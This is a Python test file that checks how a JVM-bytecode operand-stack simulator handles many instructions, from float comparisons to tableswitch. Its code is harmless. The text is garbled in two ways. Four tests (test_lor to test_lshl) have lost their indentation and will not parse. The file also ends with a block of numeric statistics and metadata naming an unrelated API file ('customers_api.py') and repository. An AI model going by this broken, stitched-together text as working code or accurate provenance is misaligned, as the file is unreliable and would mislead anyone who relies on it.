def test_fcmpg():
    """fcmpg pops two floats and pushes an int comparison result."""
    Float = OperandType.Float
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [Float]
    stack.update_stack("fconst_1")
    assert list(stack._stack) == [Float, Float]
    stack.update_stack("fcmpg")
    assert list(stack._stack) == [OperandType.Integer]
def test_fcmpl():
    """fcmpl pops two floats and pushes an int comparison result."""
    Float = OperandType.Float
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [Float]
    stack.update_stack("fconst_1")
    assert list(stack._stack) == [Float, Float]
    stack.update_stack("fcmpl")
    assert list(stack._stack) == [OperandType.Integer]
def test_fconst():
    """Each fconst_<n> short form pushes one float."""
    stack = Stack()
    for count in range(3):
        stack.update_stack(f"fconst_{count}")
        assert len(stack._stack) == count + 1
        assert stack._stack[count] == OperandType.Float
def test_fdiv():
    """fdiv pops two floats and pushes one float result."""
    Float = OperandType.Float
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [Float]
    stack.update_stack("fconst_1")
    assert list(stack._stack) == [Float, Float]
    stack.update_stack("fdiv")
    assert list(stack._stack) == [Float]
def test_fload():
    """Each fload_<n> short form pushes a float from a local slot."""
    stack = Stack()
    for slot in range(4):
        stack.update_stack(f"fload_{slot}")
        assert len(stack._stack) == slot + 1
        assert stack._stack[slot] == OperandType.Float
def test_fmul():
    """fmul pops two floats and pushes one float result."""
    Float = OperandType.Float
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [Float]
    stack.update_stack("fconst_1")
    assert list(stack._stack) == [Float, Float]
    stack.update_stack("fmul")
    assert list(stack._stack) == [Float]
def test_fneg():
    """fneg replaces the top float with a float (net stack effect zero)."""
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [OperandType.Float]
    stack.update_stack("fneg")
    assert list(stack._stack) == [OperandType.Float]
def test_frem():
    """frem pops two floats and pushes one float result."""
    Float = OperandType.Float
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [Float]
    stack.update_stack("fconst_1")
    assert list(stack._stack) == [Float, Float]
    stack.update_stack("frem")
    assert list(stack._stack) == [Float]
def test_freturn():
    """freturn pops the float return value, emptying the stack."""
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [OperandType.Float]
    stack.update_stack("freturn")
    assert not stack._stack
def test_fstore():
    """Each fstore_<n> short form pops one float into a local slot."""
    stack = Stack()
    for slot in range(4):
        stack.update_stack("fconst_0")
        assert list(stack._stack) == [OperandType.Float]
        stack.update_stack(f"fstore_{slot}")
        assert not stack._stack
def test_fsub():
    """fsub pops two floats and pushes one float result."""
    Float = OperandType.Float
    stack = Stack()
    stack.update_stack("fconst_0")
    assert list(stack._stack) == [Float]
    stack.update_stack("fconst_1")
    assert list(stack._stack) == [Float, Float]
    stack.update_stack("fsub")
    assert list(stack._stack) == [Float]
def test_getfield():
    """getfield swaps an object reference for the fetched field's type."""
    stack = Stack()
    stack.update_stack("new", cf.constants.create_class("java/lang/String"))
    assert list(stack._stack) == [OperandType.Reference]
    out_ref = cf.constants.create_field_ref(
        "java/lang/System", "out", "Ljava/io/PrintStream;")
    stack.update_stack("getfield", out_ref)
    assert list(stack._stack) == [OperandType.Reference]
def test_getstatic():
    """getstatic pushes the static field's type with nothing popped."""
    stack = Stack()
    out_ref = cf.constants.create_field_ref(
        "java/lang/System", "out", "Ljava/io/PrintStream;")
    stack.update_stack("getstatic", out_ref)
    assert list(stack._stack) == [OperandType.Reference]
def test_goto():
    """An unconditional goto leaves the operand stack untouched."""
    stack = Stack()
    stack.update_stack("goto", Label("label"))
    assert not stack._stack
def test_goto_w():
    """goto_w behaves like goto: no stack effect."""
    stack = Stack()
    stack.update_stack("goto_w", Label("label"))
    assert not stack._stack
def test_i2b():
    """i2b narrows the top int to a byte."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("i2b")
    assert list(stack._stack) == [OperandType.Byte]
def test_i2c():
    """i2c narrows the top int to a char."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("i2c")
    assert list(stack._stack) == [OperandType.Char]
def test_i2d():
    """i2d widens the top int to a double."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("i2d")
    assert list(stack._stack) == [OperandType.Double]
def test_i2f():
    """i2f converts the top int to a float."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("i2f")
    assert list(stack._stack) == [OperandType.Float]
def test_i2l():
    """i2l widens the top int to a long."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("i2l")
    assert list(stack._stack) == [OperandType.Long]
def test_i2s():
    """i2s narrows the top int to a short."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("i2s")
    assert list(stack._stack) == [OperandType.Short]
def test_iadd():
    """iadd pops two ints and pushes one int result."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("iadd")
    assert list(stack._stack) == [Int]
def test_iaload():
    """iaload pops an index and an int-array ref, pushes an int."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("newarray", OperandType.Integer.array_type)
    assert list(stack._stack) == [OperandType.Reference]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Reference, OperandType.Integer]
    stack.update_stack("iaload")
    assert list(stack._stack) == [OperandType.Integer]
def test_iand():
    """iand pops two ints and pushes one int result."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("iand")
    assert list(stack._stack) == [Int]
def test_iastore():
    """iastore pops array ref, index and value, leaving the stack empty."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("newarray", OperandType.Integer.array_type)
    assert list(stack._stack) == [OperandType.Reference]
    stack.update_stack("iconst_0")
    assert list(stack._stack) == [OperandType.Reference, OperandType.Integer]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [
        OperandType.Reference, OperandType.Integer, OperandType.Integer]
    stack.update_stack("iastore")
    assert not stack._stack
def test_iconst():
    """Each iconst_<n> short form pushes one int onto a fresh stack."""
    for value in range(6):
        stack = Stack()
        stack.update_stack(f"iconst_{value}")
        assert list(stack._stack) == [OperandType.Integer]
def test_idiv():
    """idiv pops two ints and pushes one int result."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("idiv")
    assert list(stack._stack) == [Int]
def test_if_acmp():
    """Both reference-comparison branches pop two references."""
    Ref = OperandType.Reference
    for branch in ("if_acmpeq", "if_acmpne"):
        stack = Stack()
        stack.update_stack("aconst_null")
        assert list(stack._stack) == [Ref]
        stack.update_stack("aconst_null")
        assert list(stack._stack) == [Ref, Ref]
        stack.update_stack(branch)
        assert not stack._stack
def test_if_icmp():
    """Every two-operand int-comparison branch pops two ints."""
    Int = OperandType.Integer
    branches = ("if_icmpeq", "if_icmpne", "if_icmplt",
                "if_icmpge", "if_icmpgt", "if_icmple")
    for branch in branches:
        stack = Stack()
        stack.update_stack("iconst_1")
        assert list(stack._stack) == [Int]
        stack.update_stack("iconst_1")
        assert list(stack._stack) == [Int, Int]
        stack.update_stack(branch)
        assert not stack._stack
def test_if():
    """Every one-operand int-comparison branch pops a single int."""
    for branch in ("ifne", "ifeq", "iflt", "ifge", "ifgt", "ifle"):
        stack = Stack()
        stack.update_stack("iconst_1")
        assert list(stack._stack) == [OperandType.Integer]
        stack.update_stack(branch)
        assert not stack._stack
def test_ifnonnull():
    """ifnonnull pops one reference."""
    stack = Stack()
    stack.update_stack("aconst_null")
    assert list(stack._stack) == [OperandType.Reference]
    stack.update_stack("ifnonnull")
    assert not stack._stack
def test_ifnull():
    """ifnull pops one reference."""
    stack = Stack()
    stack.update_stack("aconst_null")
    assert list(stack._stack) == [OperandType.Reference]
    stack.update_stack("ifnull")
    assert not stack._stack
def test_iinc():
    """iinc mutates a local variable only; the operand stack is untouched."""
    stack = Stack()
    stack.update_stack("iinc", 0, 0)
    assert not stack._stack
def test_iload():
    """iload and its iload_<n> short forms push an int from a local slot.

    Fix: the original skipped the ``iload_0`` short form, unlike
    ``test_lload``/``test_fload`` which cover every ``_0``..``_3`` variant.
    """
    stack = Stack()
    stack.update_stack("iload", 0)
    assert len(stack._stack) == 1
    assert stack._stack[0] == OperandType.Integer
    # Short forms iload_0 .. iload_3, each against a fresh stack.
    for slot in range(4):
        stack = Stack()
        stack.update_stack(f"iload_{slot}")
        assert len(stack._stack) == 1
        assert stack._stack[0] == OperandType.Integer
def test_imul():
    """imul pops two ints and pushes one int result."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("imul")
    assert list(stack._stack) == [Int]
def test_ineg():
    """ineg replaces the top int with an int (net stack effect zero)."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("ineg")
    assert list(stack._stack) == [OperandType.Integer]
def test_instanceof():
    """instanceof swaps a reference for a boolean result."""
    stack = Stack()
    stack.update_stack("aconst_null")
    assert list(stack._stack) == [OperandType.Reference]
    stack.update_stack("instanceof", cf.constants.create_class("java/lang/String"))
    assert list(stack._stack) == [OperandType.Boolean]
def test_invokedynamic():
    """invokedynamic pops the call-site arguments and pushes its return type."""
    Ref = OperandType.Reference
    concat_handle = cf.constants.create_method_handle(
        MethodHandleKind.INVOKE_STATIC,
        "java/lang/invoke/StringConcatFactory",
        "makeConcatWithConstants",
        "(Ljava/lang/invoke/MethodHandles$Lookup;"
        "Ljava/lang/String;Ljava/lang/invoke/MethodType;Ljava/lang/String;[Ljava/lang/Object;)"
        "Ljava/lang/invoke/CallSite;"
    )
    recipe = cf.constants.create_string("\1=\1\0")
    cf.bootstrap_methods.append(
        BootstrapMethod(concat_handle.index, (recipe.index,)))
    indy = cf.constants.create_invoke_dynamic(
        len(cf.bootstrap_methods) - 1,
        "makeConcatWithConstants",
        "(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;"
    )
    stack = Stack()
    stack.update_stack("aconst_null")
    assert list(stack._stack) == [Ref]
    stack.update_stack("aconst_null")
    assert list(stack._stack) == [Ref, Ref]
    # Two String arguments consumed, one String returned.
    stack.update_stack("invokedynamic", indy, 0, 0)
    assert list(stack._stack) == [Ref]
def test_invokeinterface():
    """invokeinterface pops the receiver and pushes the return type."""
    stack = Stack()
    stack.update_stack("aconst_null")
    assert list(stack._stack) == [OperandType.Reference]
    length_ref = cf.constants.create_method_ref(
        "java/lang/CharSequence",
        "length",
        "()I"
    )
    stack.update_stack("invokeinterface", length_ref, 0)
    assert list(stack._stack) == [OperandType.Integer]
def test_invokespecial():
    """invokespecial on a void method pops only the receiver."""
    stack = Stack()
    stack.update_stack("aconst_null")
    assert list(stack._stack) == [OperandType.Reference]
    init_ref = cf.constants.create_method_ref(
        "java/lang/Object",
        "<init>",
        "()V"
    )
    stack.update_stack("invokespecial", init_ref)
    assert not stack._stack
def test_invokestatic():
    """invokestatic pops the arguments; a void method pushes nothing."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    exit_ref = cf.constants.create_method_ref(
        "java/lang/System",
        "exit",
        "(I)V"
    )
    stack.update_stack("invokestatic", exit_ref)
    assert not stack._stack
def test_invokevirtual():
    """invokevirtual pops the receiver and pushes the return type."""
    stack = Stack()
    stack.update_stack("aconst_null")
    assert list(stack._stack) == [OperandType.Reference]
    to_string_ref = cf.constants.create_method_ref(
        "java/lang/Object",
        "toString",
        "()Ljava/lang/String;"
    )
    stack.update_stack("invokevirtual", to_string_ref)
    assert list(stack._stack) == [OperandType.Reference]
def test_ior():
    """ior pops two ints and pushes one int result."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("ior")
    assert list(stack._stack) == [Int]
def test_irem():
    """irem pops two ints and pushes one int result."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("irem")
    assert list(stack._stack) == [Int]
def test_ireturn():
    """ireturn pops the int return value, emptying the stack."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("ireturn")
    assert not stack._stack
def test_ishl():
    """ishl pops value and shift amount, pushes one int."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("ishl")
    assert list(stack._stack) == [Int]
def test_ishr():
    """ishr pops value and shift amount, pushes one int."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("ishr")
    assert list(stack._stack) == [Int]
def test_istore():
    """istore and its istore_<n> short forms pop one int into a local slot.

    Fix: the original omitted the final emptiness assertion after
    ``istore_3`` (compare ``test_lstore``, which checks it for every form).
    """
    stack = Stack()
    stack.update_stack("iconst_1")
    assert len(stack._stack) == 1
    assert stack._stack[0] == OperandType.Integer
    stack.update_stack("istore", 0)
    assert len(stack._stack) == 0
    # Short forms istore_0 .. istore_3, each against a fresh stack.
    for slot in range(4):
        stack = Stack()
        stack.update_stack("iconst_1")
        assert len(stack._stack) == 1
        assert stack._stack[0] == OperandType.Integer
        stack.update_stack(f"istore_{slot}")
        # Previously missing for istore_3: the store must empty the stack.
        assert len(stack._stack) == 0
def test_isub():
    """isub pops two ints and pushes one int result."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("isub")
    assert list(stack._stack) == [Int]
def test_iushr():
    """iushr pops value and shift amount, pushes one int."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("iushr")
    assert list(stack._stack) == [Int]
def test_ixor():
    """ixor pops two ints and pushes one int result."""
    Int = OperandType.Integer
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int]
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [Int, Int]
    stack.update_stack("ixor")
    assert list(stack._stack) == [Int]
def test_jsr():
    """jsr pushes a return address, modelled here as a reference."""
    stack = Stack()
    stack.update_stack("jsr")
    assert list(stack._stack) == [OperandType.Reference]
def test_jsr_w():
    """jsr_w behaves like jsr: pushes one reference."""
    stack = Stack()
    stack.update_stack("jsr_w")
    assert list(stack._stack) == [OperandType.Reference]
def test_l2d():
    """l2d converts the top-of-stack long to a double."""
    stack = Stack()
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [OperandType.Long]
    stack.update_stack("l2d")
    assert list(stack._stack) == [OperandType.Double]
def test_l2f():
    """l2f converts the top-of-stack long to a float."""
    stack = Stack()
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [OperandType.Long]
    stack.update_stack("l2f")
    assert list(stack._stack) == [OperandType.Float]
def test_l2i():
    """l2i narrows the top-of-stack long to an int."""
    stack = Stack()
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [OperandType.Long]
    stack.update_stack("l2i")
    assert list(stack._stack) == [OperandType.Integer]
def test_ladd():
    """ladd pops two longs and pushes one long result."""
    Long = OperandType.Long
    stack = Stack()
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [Long]
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [Long, Long]
    stack.update_stack("ladd")
    assert list(stack._stack) == [Long]
def test_laload():
    """laload pops an index and a long-array ref, pushes a long."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("newarray", OperandType.Long.array_type)
    assert list(stack._stack) == [OperandType.Reference]
    stack.update_stack("iconst_0")
    assert list(stack._stack) == [OperandType.Reference, OperandType.Integer]
    stack.update_stack("laload")
    assert list(stack._stack) == [OperandType.Long]
def test_land():
    """land pops two longs and pushes one long result."""
    Long = OperandType.Long
    stack = Stack()
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [Long]
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [Long, Long]
    stack.update_stack("land")
    assert list(stack._stack) == [Long]
def test_lastore():
    """lastore pops array ref, index and long value, emptying the stack."""
    stack = Stack()
    stack.update_stack("iconst_1")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("newarray", OperandType.Long.array_type)
    assert list(stack._stack) == [OperandType.Reference]
    stack.update_stack("iconst_0")
    assert list(stack._stack) == [OperandType.Reference, OperandType.Integer]
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [
        OperandType.Reference, OperandType.Integer, OperandType.Long]
    stack.update_stack("lastore")
    assert not stack._stack
def test_lcmp():
    """lcmp pops two longs and pushes an int comparison result."""
    Long = OperandType.Long
    stack = Stack()
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [Long]
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [Long, Long]
    stack.update_stack("lcmp")
    assert list(stack._stack) == [OperandType.Integer]
def test_lconst():
    """Both lconst short forms push one long onto a fresh stack."""
    for op in ("lconst_0", "lconst_1"):
        stack = Stack()
        stack.update_stack(op)
        assert list(stack._stack) == [OperandType.Long]
def test_ldc():
    """ldc pushes the type matching the constant-pool entry's kind."""
    cases = (
        (cf.constants.create_integer(1), OperandType.Integer),
        (cf.constants.create_float(1.0), OperandType.Float),
        (cf.constants.create_string("test"), OperandType.Reference),
        (cf.constants.create_class("java/lang/String"), OperandType.Reference),
    )
    for constant, expected in cases:
        stack = Stack()
        stack.update_stack("ldc", constant)
        assert list(stack._stack) == [expected]
def test_ldc2_w():
    """ldc2_w pushes a category-2 constant (long or double)."""
    cases = (
        (cf.constants.create_long(1), OperandType.Long),
        (cf.constants.create_double(1.0), OperandType.Double),
    )
    for constant, expected in cases:
        stack = Stack()
        stack.update_stack("ldc2_w", constant)
        assert list(stack._stack) == [expected]
def test_ldiv():
    """ldiv pops two longs and pushes one long result."""
    Long = OperandType.Long
    stack = Stack()
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [Long]
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [Long, Long]
    stack.update_stack("ldiv")
    assert list(stack._stack) == [Long]
def test_lload():
    """lload and its lload_<n> short forms push a long from a local slot."""
    stack = Stack()
    stack.update_stack("lload", 0)
    assert list(stack._stack) == [OperandType.Long]
    for slot in range(4):
        stack = Stack()
        stack.update_stack(f"lload_{slot}")
        assert list(stack._stack) == [OperandType.Long]
def test_lmul():
    """lmul pops two longs and pushes one long result."""
    Long = OperandType.Long
    stack = Stack()
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [Long]
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [Long, Long]
    stack.update_stack("lmul")
    assert list(stack._stack) == [Long]
def test_lneg():
    """lneg replaces the top long with a long (net stack effect zero)."""
    stack = Stack()
    stack.update_stack("lconst_0")
    assert list(stack._stack) == [OperandType.Long]
    stack.update_stack("lneg")
    assert list(stack._stack) == [OperandType.Long]
def test_lookupswitch():
    """lookupswitch pops its int selector."""
    stack = Stack()
    stack.update_stack("iconst_0")
    assert list(stack._stack) == [OperandType.Integer]
    stack.update_stack("lookupswitch")
    assert not stack._stack
def test_lor():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("lor")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lrem():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Long
stack.update_stack("lrem")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lreturn():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("lreturn")
assert len(stack._stack) == 0
def test_lshl():
stack = Stack()
stack.update_stack("lconst_0")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
stack.update_stack("iconst_0")
assert len(stack._stack) == 2
assert stack._stack[1] == OperandType.Integer
stack.update_stack("lshl")
assert len(stack._stack) == 1
assert stack._stack[0] == OperandType.Long
def test_lshr():
    """lshr pops a long value plus an int shift amount, pushes a long."""
    s = Stack()
    s.update_stack("lconst_0")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Long
    s.update_stack("iconst_0")
    assert len(s._stack) == 2
    assert s._stack[1] == OperandType.Integer
    s.update_stack("lshr")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Long
def test_lstore():
    """Every lstore variant consumes the single long on the stack."""
    # Indexed form takes the local-variable slot as an explicit operand.
    s = Stack()
    s.update_stack("lconst_0")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Long
    s.update_stack("lstore", 0)
    assert len(s._stack) == 0
    # Shorthand forms lstore_0 .. lstore_3 behave identically.
    for variant in ("lstore_0", "lstore_1", "lstore_2", "lstore_3"):
        s = Stack()
        s.update_stack("lconst_0")
        assert len(s._stack) == 1
        assert s._stack[0] == OperandType.Long
        s.update_stack(variant)
        assert len(s._stack) == 0
def test_lsub():
    """lsub pops two longs and pushes a single long difference."""
    s = Stack()
    for depth in (1, 2):
        s.update_stack("lconst_0")
        assert len(s._stack) == depth
        assert s._stack[depth - 1] == OperandType.Long
    s.update_stack("lsub")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Long
def test_lushr():
    """lushr pops a long value plus an int shift amount, pushes a long."""
    s = Stack()
    s.update_stack("lconst_0")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Long
    s.update_stack("iconst_0")
    assert len(s._stack) == 2
    assert s._stack[1] == OperandType.Integer
    s.update_stack("lushr")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Long
def test_lxor():
    """lxor pops two longs and pushes a single long result."""
    s = Stack()
    for depth in (1, 2):
        s.update_stack("lconst_0")
        assert len(s._stack) == depth
        assert s._stack[depth - 1] == OperandType.Long
    s.update_stack("lxor")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Long
def test_monitorenter():
    """monitorenter consumes the object reference on the stack."""
    s = Stack()
    s.update_stack("aconst_null")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Reference
    s.update_stack("monitorenter")
    assert len(s._stack) == 0
def test_monitorexit():
    """monitorexit consumes the object reference on the stack."""
    s = Stack()
    s.update_stack("aconst_null")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Reference
    s.update_stack("monitorexit")
    assert len(s._stack) == 0
def test_multianewarray():
    """multianewarray replaces its dimension count(s) with one reference."""
    s = Stack()
    s.update_stack("iconst_0")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Integer
    array_class = cf.constants.create_class("java/lang/String")
    s.update_stack("multianewarray", array_class, 1)
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Reference
def test_new():
    """new pushes a reference to the freshly allocated object."""
    s = Stack()
    s.update_stack("new", cf.constants.create_class("java/lang/String"))
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Reference
def test_newarray():
    """newarray swaps the int length for an array reference."""
    s = Stack()
    s.update_stack("iconst_0")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Integer
    s.update_stack("newarray", OperandType.Integer.array_type)
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Reference
def test_nop():
    """nop must not touch the operand stack."""
    s = Stack()
    s.update_stack("nop")
    assert len(s._stack) == 0
def test_pop():
    """pop removes exactly one category-1 value."""
    s = Stack()
    s.update_stack("iconst_0")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Integer
    s.update_stack("pop")
    assert len(s._stack) == 0
def test_pop2():
    """pop2 drops either two category-1 values or one category-2 value."""
    # Two ints removed at once.
    s = Stack()
    for depth in (1, 2):
        s.update_stack("iconst_0")
        assert len(s._stack) == depth
        assert s._stack[depth - 1] == OperandType.Integer
    s.update_stack("pop2")
    assert len(s._stack) == 0
    # A single long removed at once.
    s = Stack()
    s.update_stack("lconst_0")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Long
    s.update_stack("pop2")
    assert len(s._stack) == 0
def test_putfield():
    """putfield consumes both the target reference and the value."""
    s = Stack()
    s.update_stack("aconst_null")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Reference
    s.update_stack("iconst_0")
    assert len(s._stack) == 2
    assert s._stack[1] == OperandType.Integer
    field = cf.constants.create_field_ref("java/lang/String", "value", "I")
    s.update_stack("putfield", field)
    assert len(s._stack) == 0
def test_putstatic():
    """putstatic consumes only the value (no receiver needed)."""
    s = Stack()
    s.update_stack("iconst_0")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Integer
    field = cf.constants.create_field_ref("java/lang/String", "value", "I")
    s.update_stack("putstatic", field)
    assert len(s._stack) == 0
def test_ret():
    """ret does not touch the operand stack."""
    s = Stack()
    s.update_stack("ret")
    assert len(s._stack) == 0
def test_return():
    """return (void) leaves an empty stack untouched."""
    s = Stack()
    s.update_stack("return")
    assert len(s._stack) == 0
def test_saload():
    """saload pops array-ref + index and pushes a short element."""
    s = Stack()
    s.update_stack("iconst_1")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Integer
    s.update_stack("newarray", OperandType.Short.array_type)
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Reference
    s.update_stack("iconst_0")
    assert len(s._stack) == 2
    assert s._stack[1] == OperandType.Integer
    s.update_stack("saload")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Short
def test_sastore():
    """sastore pops array-ref, index, and value, leaving the stack empty."""
    s = Stack()
    s.update_stack("iconst_1")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Integer
    s.update_stack("newarray", OperandType.Short.array_type)
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Reference
    s.update_stack("iconst_0")
    assert len(s._stack) == 2
    assert s._stack[1] == OperandType.Integer
    s.update_stack("iconst_1")
    assert len(s._stack) == 3
    assert s._stack[2] == OperandType.Integer
    s.update_stack("sastore")
    assert len(s._stack) == 0
def test_sipush():
    """sipush pushes its immediate operand as an int."""
    s = Stack()
    s.update_stack("sipush", 1)
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Integer
def test_swap():
    """swap exchanges the top two values; both slots stay int-typed."""
    s = Stack()
    s.update_stack("iconst_0")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Integer
    s.update_stack("iconst_1")
    assert len(s._stack) == 2
    assert s._stack[1] == OperandType.Integer
    s.update_stack("swap")
    assert len(s._stack) == 2
    assert s._stack[0] == OperandType.Integer
    assert s._stack[1] == OperandType.Integer
def test_tableswitch():
    """tableswitch consumes the int key and leaves the stack empty."""
    s = Stack()
    s.update_stack("iconst_0")
    assert len(s._stack) == 1
    assert s._stack[0] == OperandType.Integer
    s.update_stack("tableswitch", 0, 0, 0, 0)
    assert len(s._stack) == 0
| 30.299856
| 118
| 0.67401
| 8,302
| 63,054
| 4.892074
| 0.027945
| 0.318363
| 0.183188
| 0.217068
| 0.942828
| 0.934456
| 0.928079
| 0.909612
| 0.89969
| 0.89383
| 0
| 0.02451
| 0.18795
| 63,054
| 2,080
| 119
| 30.314423
| 0.768685
| 0
| 0
| 0.79217
| 0
| 0.000576
| 0.065801
| 0.005614
| 0
| 0
| 0
| 0
| 0.515256
| 1
| 0.080023
| false
| 0
| 0.003454
| 0
| 0.083477
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
03f7695b0d98f72cfdfbf3d36ebfa2e923717419
| 57,891
|
py
|
Python
|
amparex/api/customers_api.py
|
Inch4Tk/amparex_python_api
|
f372c15a1e67293329bdd8bee8ad66624ed1341f
|
[
"Apache-2.0"
] | null | null | null |
amparex/api/customers_api.py
|
Inch4Tk/amparex_python_api
|
f372c15a1e67293329bdd8bee8ad66624ed1341f
|
[
"Apache-2.0"
] | null | null | null |
amparex/api/customers_api.py
|
Inch4Tk/amparex_python_api
|
f372c15a1e67293329bdd8bee8ad66624ed1341f
|
[
"Apache-2.0"
